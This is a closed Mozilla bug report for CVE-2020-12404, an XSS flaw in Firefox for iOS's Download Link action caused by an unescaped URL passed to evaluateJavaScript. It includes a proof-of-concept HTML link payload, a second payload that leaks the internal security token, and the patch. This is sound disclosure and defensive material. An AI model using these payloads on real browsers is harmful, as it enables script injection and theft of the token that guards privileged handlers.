Closed Bug 1631739 (CVE-2020-12404) Opened 9 months ago Closed 9 months ago

XSS from booby-trapped link on Firefox iOS Download Link Action

Categories

(Firefox for iOS :: General, defect, P1)

defect

Tracking

()

RESOLVED FIXED
Tracking Status
fxios 26 ---

People

(Reporter: vinothsparrow, Assigned: garvan)

Details

(Keywords: csectype-sop, sec-moderate, Whiteboard: [reporter-external] [client-bounty-form] [verif?] [user interaction keeps it from being sec-high])

Attachments

(2 files)

Attached file firefox-ios.html

Firefox Version: v24.1
OS: iOS 13.3.1

Issue: Universal XSS on Firefox iOS Download link Action

Description:

Firefox iOS user clicks download link in hyperlink option and XSS is triggered on current url, When the hyperlink is in format https://anydomain/','123');alert(document.domain);//

Sample attack scenerio

Steps to reproduce:

  1. Open https://vinothkumar.tech/firefox-ios your iOS firefox browser.
  2. Hold the link until preview popup appears.
  3. Click Download Link
  4. XSS is triggered

Root Cause:
https://github.com/mozilla-mobile/firefox-ios/blob/v24.1/Client/Frontend/Browser/BrowserViewController/BrowserViewController+WebViewDelegates.swift#L171

Unescaped url link is being appeneded to the javascript when download action clicked

currentTab.webView?.evaluateJavaScript("window.__firefox__.download('\(url.absoluteString)', '\(UserScriptManager.securityToken)')")

Fix:

let safeUrl = url.absoluteString.replacingOccurrences(of: "'", with: "%27")
currentTab.webView?.evaluateJavaScript("window.__firefox__.download('\(safeUrl)', '\(UserScriptManager.securityToken)')")

Youtube Unlisted Video: https://youtu.be/zkVVolyCrt0

POC:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Firefox Universal Download Link XSS POC</title>
</head>
<body>
<a href="http://vinothsparrow.herokuapp.com/','123');alert(document.domain);//">Download Link in Firefox</a><br><br>
</body>
</html>

Flags: sec-bounty?

Garvan, can you help prioritize this? I don't have an iOS device but the write-up in comment #0 looks pretty serious.

Group: firefox-core-security → mobile-core-security
Type: task → defect
Component: Security → General
Flags: needinfo?(gkeeley)
Product: Firefox → Firefox for iOS
Flags: needinfo?(gkeeley)

Also with this issue attacker can get security token value in the XSS. Using security token attacker can trigger webkit.messageHandlers events(loginsManagerMessageHandler, printHandler, sessionRestoreHelper, .. etc)

Payload to get security token:

<a href="https://domain/','123');a=eval(decodeURIComponent('(function(a,b){alert(b);})'));a('1">XSS</a>

The above payload will alert the security token.

Assignee: nobody → gkeeley
Priority: -- → P1

landed for v25 of Firefox iOS, the next release

Status: UNCONFIRMED → RESOLVED
Closed: 9 months ago
Resolution: --- → FIXED
Whiteboard: [reporter-external] [client-bounty-form] [verif?] → [reporter-external] [client-bounty-form] [verif?] [user interaction keeps it from being sec-high]

It's not exactly a "Universal" XSS -- the attacker can't pick any arbitrary victim site. The target site has to be one where users can add links (which is still a large number of popular sites, especial social ones) and a context where the victim will want to download the link rather than click on it to open.

Summary: Universal XSS on Firefox iOS Download Link Action → XSS from booby-trapped link on Firefox iOS Download Link Action
Group: mobile-core-security → core-security-release

CVE for v25 was missed for this bug, assigning it to v26 in order to get picked up by the release notes process.
The bug https://bugzilla.mozilla.org/show_bug.cgi?id=1632387 is the same type of attack, leaking the token, and did have a sec advisory for v25.

tracking-fxios: --- → 26
Attached file advisory.txt

Can you add a CVE to this bug? Thanks

$ ./ios_advisories.py 26
Generating advisories for Firefox for iOS Version 26
1631739 is missing a CVE identified....

Flags: needinfo?(dveditz)

Use CVE-2020-12404 for this one.

Alias: CVE-2020-12404
Flags: needinfo?(dveditz)
Group: core-security-release
You need to log in before you can comment on or make changes to this bug.